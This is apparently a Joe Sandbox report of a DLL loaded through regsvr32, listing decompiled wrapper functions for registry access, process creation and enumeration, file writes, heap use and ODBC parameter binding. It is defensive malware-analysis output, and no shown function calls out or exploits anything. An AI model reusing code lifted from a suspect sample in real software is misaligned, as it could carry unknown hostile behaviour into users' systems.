Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Function 10004D18, Relevance: 1.5, APIs: 1, Instructions: 27

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 65%

			E10004D18(void* _a4, intOrPtr _a8, int _a12, int _a16, void** _a20) {
				long _v4;
				intOrPtr _v8;
				short* _v12;
				intOrPtr _t13;
				intOrPtr _t15;
				void* _t19;

				_push(0);
				_push(0);
				_push(0);
				E10007000(_t19, _a8);
				if( *0x100280a8 == 0) {
					_t13 = 0xffffffff;
				} else {
					_t15 =  *0x100280a8;
					_v8 = _t15;
					_v4 = RegOpenKeyExW(_a4, _v12, _a12, _a16, _a20);
					_t13 = _v4;
				}
				return E1000AF30(_t13, _v12);
			}

0x10004d1a
0x10004d1b
0x10004d1c
0x10004d24
0x10004d30
0x10004d61
0x10004d32
0x10004d38
0x10004d39
0x10004d55
0x10004d59
0x10004d59
0x10004d75

APIs

RegOpenKeyExW.KERNEL32(?,?,?,?,?,00000000,00000000,1000306E,?,?,00000000,00000001,?,00000000,00000000,00000000), ref: 10004D51

Part of subcall function 1000AF30: HeapFree.KERNEL32(008B0000,00000000,00000000), ref: 1000AF48

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Function 10002FC9, Relevance: 1.5, APIs: 1, Instructions: 24

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E10002FC9(void* _a4, intOrPtr _a8, int* _a12, int* _a16, char* _a20, int* _a24) {
				intOrPtr _v4;
				short* _v8;
				long _t12;
				intOrPtr _t14;
				void* _t17;

				_push(0);
				_push(0);
				E10007000(_t17, _a8);
				if( *0x100280c8 == 0) {
					_t12 = 0;
				} else {
					_t14 =  *0x100280c8;
					_v4 = _t14;
					_t12 = RegQueryValueExW(_a4, _v8, _a12, _a16, _a20, _a24);
				}
				return E1000AF30(_t12, _v8);
			}

0x10002fcb
0x10002fcc
0x10002fd4
0x10002fe0
0x1000300b
0x10002fe2
0x10002fe8
0x10002fe9
0x10003005
0x10003005
0x10003018

APIs

RegQueryValueExW.KERNEL32(?,?,?,?,?,?,00000000,100030A2,?,?,00000000,00000000,00000000,00000000,?,?), ref: 10003005

Part of subcall function 1000AF30: HeapFree.KERNEL32(008B0000,00000000,00000000), ref: 1000AF48

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Function 10001A1D, Relevance: 1.5, APIs: 1, Instructions: 22

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E10001A1D(WCHAR* _a4, WCHAR* _a8, struct _SECURITY_ATTRIBUTES* _a12, struct _SECURITY_ATTRIBUTES* _a16, int _a20, long _a24, void* _a28, WCHAR* _a32, struct _STARTUPINFOW* _a36, struct _PROCESS_INFORMATION* _a40) {
				char _v4;
				int _t13;

				_push(0);
				if( *0x100280a0 == 0) {
					_t13 = 0;
				} else {
					_push( *0x100280a0);
					_v4 = 0;
					_t13 = CreateProcessW(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40);
				}
				return _t13;
			}

0x10001a1f
0x10001a27
0x10001a61
0x10001a29
0x10001a29
0x10001a30
0x10001a5b
0x10001a5b
0x10001a66

APIs

CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?,10002D5E,00000000,?,?,00000000,00000000), ref: 10001A5B

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Function 10003353, Relevance: 1.5, APIs: 1, Instructions: 21

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E10003353(void* _a4, short* _a8, int _a12, short* _a16, int _a20, int _a24, struct _SECURITY_ATTRIBUTES* _a28, void** _a32, int* _a36) {
				char _v4;
				long _t12;

				_push(0);
				if( *0x10028124 == 0) {
					_t12 = 0;
				} else {
					_push( *0x10028124);
					_v4 = 0;
					_t12 = RegCreateKeyExW(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
				}
				return _t12;
			}

0x10003355
0x1000335d
0x10003393
0x1000335f
0x1000335f
0x10003366
0x1000338d
0x1000338d
0x10003398

APIs

RegCreateKeyExW.KERNEL32(?,?,?,?,?,?,?,?,?,100013D8,?,?,00000000,00000000,00000000,00000004), ref: 1000338D

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Function 100026A4, Relevance: 1.5, APIs: 1, Instructions: 19

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E100026A4(WCHAR* _a4, long _a8, long _a12, struct _SECURITY_ATTRIBUTES* _a16, long _a20, long _a24, void* _a28) {
				char _v4;
				void* _t10;

				_push(0);
				if( *0x100280ac == 0) {
					_t10 = 0;
				} else {
					_push( *0x100280ac);
					_v4 = 0;
					_t10 = CreateFileW(_a4, _a8, _a12, _a16, _a20, _a24, _a28);
				}
				return _t10;
			}

0x100026a6
0x100026ae
0x100026dc
0x100026b0
0x100026b0
0x100026b7
0x100026d6
0x100026d6
0x100026e1

APIs

CreateFileW.KERNEL32(00000006,00000006,00000006,00000006,00000006,00000006,00000006,1000154D,00000018,00000002,00000000,00000000,00000002,00000080,00000000,?), ref: 100026D6

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Function 100032E6, Relevance: 1.5, APIs: 1, Instructions: 19

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E100032E6(void* _a4, short* _a8, int _a12, int _a16, char* _a20, int _a24) {
				char _v8;
				long _t9;

				_push(0);
				_push(0);
				if( *0x100280c4 == 0) {
					_t9 = 0;
				} else {
					_push( *0x100280c4);
					_v8 = 0;
					_t9 = RegSetValueExW(_a4, _a8, _a12, _a16, _a20, _a24);
				}
				return _t9;
			}

0x100032e8
0x100032e9
0x100032f1
0x1000331b
0x100032f3
0x100032f3
0x100032fa
0x10003315
0x10003315
0x10003320

APIs

RegSetValueExW.KERNEL32(?,?,?,?,?,?,00000000,10002E0E,?,?,00000000,00000001,?,-00000002,?,?), ref: 10003315

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Function 10002F06, Relevance: 1.5, APIs: 1, Instructions: 17

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E10002F06(void* _a4, void* _a8, long _a12, DWORD* _a16, struct _OVERLAPPED* _a20) {
				char _v4;
				int _t8;

				_push(0);
				if( *0x100280f0 == 0) {
					_t8 = 0;
				} else {
					_push( *0x100280f0);
					_v4 = 0;
					_t8 = WriteFile(_a4, _a8, _a12, _a16, _a20);
				}
				return _t8;
			}

0x10002f08
0x10002f10
0x10002f36
0x10002f12
0x10002f12
0x10002f19
0x10002f30
0x10002f30
0x10002f3b

APIs

WriteFile.KERNEL32(?,?,?,?,?,10001575,00000004,?,?,00000000,00000000,00000018,00000002,00000000,00000000,00000002), ref: 10002F30

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Function 10003A20, Relevance: 1.5, APIs: 1, Instructions: 14

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E10003A20(void* _a4, struct tagPROCESSENTRY32W _a8) {
				char _v4;
				int _t5;

				_push(0);
				if( *0x100280d8 == 0) {
					_t5 = 0;
				} else {
					_push( *0x100280d8);
					_v4 = 0;
					_t5 = Process32NextW(_a4, _a8);
				}
				return _t5;
			}

0x10003a22
0x10003a2a
0x10003a44
0x10003a2c
0x10003a2c
0x10003a33
0x10003a3e
0x10003a3e
0x10003a49

APIs

Process32NextW.KERNEL32(?,?,10003266,00000002,?,00000002), ref: 10003A3E

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Function 10008060, Relevance: 1.5, APIs: 1, Instructions: 10

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E10008060(long _a4) {
				long _t2;
				void* _t4;

				_t2 = _a4;
				if(_t2 <= 0) {
					return 0;
				} else {
					_t4 = RtlAllocateHeap( *0x1002c538, 8, _t2); // executed
					return _t4;
				}
			}

0x10008060
0x10008066
0x1000807c
0x10008068
0x10008071
0x10008077
0x10008077

APIs

RtlAllocateHeap.NTDLL(00000008,00000104,100054E4,00000104,00000000,00000000,00000000,100030F8,00000000,00000000,10004E9A,10000000,10003979), ref: 10008071

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Function 10008040, Relevance: 1.5, APIs: 1, Instructions: 6

C-Code - Quality: 100%

			E10008040() {
				void* _t1;

				_t1 = HeapCreate(0, 0x1000, 0); // executed
				 *0x1002c538 = _t1;
				return _t1;
			}

0x10008049
0x1000804f
0x10008054

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,1000106F,00000000,00001000,00000000,10001015), ref: 10008049

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Function 1000B180, Relevance: 1.3, APIs: 1, Instructions: 35

C-Code - Quality: 100%

			E1000B180(signed int _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t15;
				void* _t19;
				void* _t20;
				intOrPtr _t21;
				void* _t25;
				void* _t27;
				intOrPtr _t30;

				_t21 =  *0x1002c3a4; // 0x0
				_v8 = _t21 + _a4 * 2;
				_t15 =  *0x1002c5c4; // 0x4010
				if(_v8 >= _t15 - 4) {
					 *0x1002c5c4 = _v8 + 0x4000;
					_t30 =  *0x1002c5c4; // 0x4010
					_t19 =  *0x10027730; // 0x8b0930
					_t25 =  *0x1002c5c0; // 0x8b0000
					_t20 = HeapReAlloc(_t25, 0, _t19, _t30 + 0xa); // executed
					 *0x10027730 = _t20;
				}
				_t27 =  *0x10027730; // 0x8b0930
				_v12 = _t27 + _a8;
				 *0x1002c3a4 = _a8 + _a4 * 2;
				return _v12;
			}

0x1000b189
0x1000b192
0x1000b195
0x1000b1a0
0x1000b1ab
0x1000b1b1
0x1000b1bb
0x1000b1c3
0x1000b1ca
0x1000b1d0
0x1000b1d0
0x1000b1d5
0x1000b1de
0x1000b1ea
0x1000b1f6

APIs

HeapReAlloc.KERNEL32(008B0000,00000000,008B0930,00004006,?,00000000), ref: 1000B1CA

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Function 1000AFE0, Relevance: 1.3, APIs: 1, Instructions: 31

C-Code - Quality: 100%

			E1000AFE0(wchar_t* _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _t9;
				short* _t10;
				intOrPtr _t13;
				intOrPtr _t17;

				if(_a4 == 0) {
					_t9 =  *0x10027730; // 0x8b0930
					_t10 = _t9 +  *0x1002c3a4;
					 *_t10 = 0;
					return _t10;
				}
				_v8 = wcslen(_a4);
				_t17 =  *0x1002c3a4; // 0x0
				_t13 = E1000B180(_v8, _t17); // executed
				_v12 = _t13;
				return E1000B260(_a4, _v12, _a4, _v8);
			}

0x1000afea
0x1000b021
0x1000b026
0x1000b02e
0x00000000
0x1000b02e
0x1000aff8
0x1000affb
0x1000b006
0x1000b00b
0x00000000

APIs

wcslen.MSVCRT ref: 1000AFF0

Part of subcall function 1000B180: HeapReAlloc.KERNEL32(008B0000,00000000,008B0930,00004006,?,00000000), ref: 1000B1CA

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Function 1000AF30, Relevance: 1.3, APIs: 1, Instructions: 16

C-Code - Quality: 100%

			E1000AF30(void* __eax, void* _a4) {
				int _t5;
				void* _t6;

				if(_a4 != 0) {
					_t6 =  *0x1002c5c0; // 0x8b0000
					_t5 = HeapFree(_t6, 0, _a4); // executed
					return _t5;
				}
				return __eax;
			}

0x1000af39
0x1000af41
0x1000af48
0x00000000
0x1000af48
0x1000af51

APIs

HeapFree.KERNEL32(008B0000,00000000,00000000), ref: 1000AF48

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Non-executed Functions

Function 10008B47, Relevance: 4.5, APIs: 3, Instructions: 41

C-Code - Quality: 40%

			E10008B47(intOrPtr _a4, intOrPtr _a8, wchar_t* _a12) {
				signed int _t12;
				intOrPtr* _t15;
				void* _t18;
				intOrPtr _t19;
				intOrPtr _t23;
				signed int _t24;
				wchar_t* _t25;

				_t12 = wcslen(_a12);
				_t19 = _a4;
				_t24 = _t12;
				_t25 = E1000AA6C(_t19 + 0x18, 0xa + _t24 * 2);
				wcscpy(_t25, _a12);
				_t15 = E1000AA6C(_t19 + 0x1c, 0xc);
				_t23 = _t24 + _t24;
				 *_t15 = _t23;
				_push(_t15);
				_push(_t23 + 2);
				_push(_t25);
				_push(0);
				_push(_t24);
				_push(0xfffffff7);
				_push(0xfffffff8);
				_push(1);
				_t18 = _a8 + 1;
				_push(_t18);
				_push( *((intOrPtr*)(_t19 + 8)));
				L100073CB();
				return _t18;
			}

0x10008b4e
0x10008b53
0x10008b57
0x10008b6e
0x10008b71
0x10008b7c
0x10008b84
0x10008b87
0x10008b89
0x10008b8d
0x10008b92
0x10008b93
0x10008b95
0x10008b96
0x10008b98
0x10008b9a
0x10008b9c
0x10008b9d
0x10008b9e
0x10008ba1
0x10008ba9

APIs

wcslen.MSVCRT ref: 10008B4E

Part of subcall function 1000AA6C: HeapAlloc.KERNEL32(00000008,?,10008B6A,?,?,?), ref: 1000AA78

wcscpy.MSVCRT ref: 10008B71
SQLBindParameter.ODBC32(?,?,00000001,000000F8,000000F7,00000000,00000000,00000000,?,00000000), ref: 10008BA1

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Function 10008F1D, Relevance: 3.1, APIs: 2, Instructions: 52

APIs

Part of subcall function 1000AA6C: HeapAlloc.KERNEL32(00000008,?,10008B6A,?,?,?), ref: 1000AA78

SQLBindParameter.ODBC32(?,?,00000001,000000FE,000000FD,?,00000000,?,?,00000000), ref: 10008F54
SQLBindParameter.ODBC32(?,?,00000001,000000FE,000000FC,?,00000000,?,?,00000000,?,?,00000001,000000FE,000000FD,?), ref: 10008F7B

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Function 1000909D, Relevance: 1.5, APIs: 1, Instructions: 36

C-Code - Quality: 37%

			E1000909D(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr* _t11;
				void* _t13;
				intOrPtr _t17;
				intOrPtr _t18;
				intOrPtr* _t19;

				_t18 = _a4;
				_t19 = E1000AA6C(_t18 + 0x18, 0x10);
				 *_t19 = _a12;
				 *((intOrPtr*)(_t19 + 4)) = _a16;
				_t11 = E1000AA6C(_t18 + 0x1c, 0xc);
				_t17 = 8;
				_push(_t11);
				_push(_t17);
				_push(_t19);
				_push(0);
				_push(0);
				_push(0xfffffffb);
				 *_t11 = _t17;
				_push(0xffffffe7);
				_push(1);
				_t13 = _a8 + 1;
				_push(_t13);
				_push( *((intOrPtr*)(_t18 + 8)));
				L100073CB();
				return _t13;
			}

0x1000909f
0x100090b2
0x100090b6
0x100090bc
0x100090c3
0x100090cd
0x100090ce
0x100090cf
0x100090d0
0x100090d1
0x100090d3
0x100090d5
0x100090d7
0x100090dd
0x100090df
0x100090e1
0x100090e2
0x100090e3
0x100090e6
0x100090ed

APIs

Part of subcall function 1000AA6C: HeapAlloc.KERNEL32(00000008,?,10008B6A,?,?,?), ref: 1000AA78

SQLBindParameter.ODBC32(?,?,00000001,000000E7,000000FB,00000000,00000000,00000000,00000008,00000000), ref: 100090E6

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Function 1000901D, Relevance: 1.5, APIs: 1, Instructions: 34

C-Code - Quality: 34%

			E1000901D(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr* _t9;
				void* _t11;
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr* _t16;

				_t15 = _a4;
				_t16 = E1000AA6C(_t15 + 0x18, 0xc);
				 *_t16 = _a12;
				_t9 = E1000AA6C(_t15 + 0x1c, 0xc);
				_t14 = 4;
				_push(_t9);
				_push(_t14);
				_push(_t16);
				_push(0);
				_push(0);
				_push(_t14);
				 *_t9 = _t14;
				_push(0xfffffff0);
				_push(1);
				_t11 = _a8 + 1;
				_push(_t11);
				_push( *((intOrPtr*)(_t15 + 8)));
				L100073CB();
				return _t11;
			}

0x1000901f
0x10009032
0x10009036
0x1000903c
0x10009046
0x10009047
0x10009048
0x10009049
0x1000904a
0x1000904c
0x1000904e
0x1000904f
0x10009055
0x10009057
0x10009059
0x1000905a
0x1000905b
0x1000905e
0x10009065

APIs

Part of subcall function 1000AA6C: HeapAlloc.KERNEL32(00000008,?,10008B6A,?,?,?), ref: 1000AA78

SQLBindParameter.ODBC32(?,?,00000001,000000F0,00000004,00000000,00000000,00000000,00000004,00000000), ref: 1000905E

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Function 10008F87, Relevance: 1.5, APIs: 1, Instructions: 34

C-Code - Quality: 34%

			E10008F87(intOrPtr _a4, intOrPtr _a8, long long _a12) {
				intOrPtr* _t9;
				void* _t11;
				intOrPtr _t13;
				intOrPtr _t14;
				long long* _t15;

				_t14 = _a4;
				_t15 = E1000AA6C(_t14 + 0x18, 0x10);
				 *_t15 = _a12;
				_t9 = E1000AA6C(_t14 + 0x1c, 0xc);
				_t13 = 8;
				_push(_t9);
				_push(_t13);
				_push(_t15);
				_push(2);
				_push(0);
				_push(_t13);
				 *_t9 = _t13;
				_push(_t13);
				_push(1);
				_t11 = _a8 + 1;
				_push(_t11);
				_push( *((intOrPtr*)(_t14 + 8)));
				L100073CB();
				return _t11;
			}

0x10008f89
0x10008f9f
0x10008fa4
0x10008fa6
0x10008fb0
0x10008fb1
0x10008fb2
0x10008fb3
0x10008fb4
0x10008fb6
0x10008fb8
0x10008fb9
0x10008fbf
0x10008fc0
0x10008fc2
0x10008fc3
0x10008fc4
0x10008fc7
0x10008fce

APIs

Part of subcall function 1000AA6C: HeapAlloc.KERNEL32(00000008,?,10008B6A,?,?,?), ref: 1000AA78

SQLBindParameter.ODBC32(?,?,00000001,00000008,00000008,00000000,00000002,00000000,00000008,00000000), ref: 10008FC7

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Function 10008FD1, Relevance: 1.5, APIs: 1, Instructions: 34

C-Code - Quality: 34%

			E10008FD1(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr* _t9;
				void* _t11;
				intOrPtr _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t14 = _a4;
				_t15 = E1000AA6C(_t14 + 0x18, 0xc);
				 *_t15 = _a12;
				_t9 = E1000AA6C(_t14 + 0x1c, 0xc);
				_t13 = 4;
				_push(_t9);
				_push(_t13);
				_push(_t15);
				_push(0);
				_push(0);
				_push(6);
				 *_t9 = _t13;
				_push(7);
				_push(1);
				_t11 = _a8 + 1;
				_push(_t11);
				_push( *((intOrPtr*)(_t14 + 8)));
				L100073CB();
				return _t11;
			}

0x10008fd3
0x10008fe9
0x10008fee
0x10008ff0
0x10008ffa
0x10008ffb
0x10008ffc
0x10008ffd
0x10008ffe
0x10009000
0x10009002
0x10009004
0x1000900a
0x1000900c
0x1000900e
0x1000900f
0x10009010
0x10009013
0x1000901a

APIs

Part of subcall function 1000AA6C: HeapAlloc.KERNEL32(00000008,?,10008B6A,?,?,?), ref: 1000AA78

SQLBindParameter.ODBC32(?,?,00000001,00000007,00000006,00000000,00000000,00000000,00000004,00000000), ref: 10009013

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
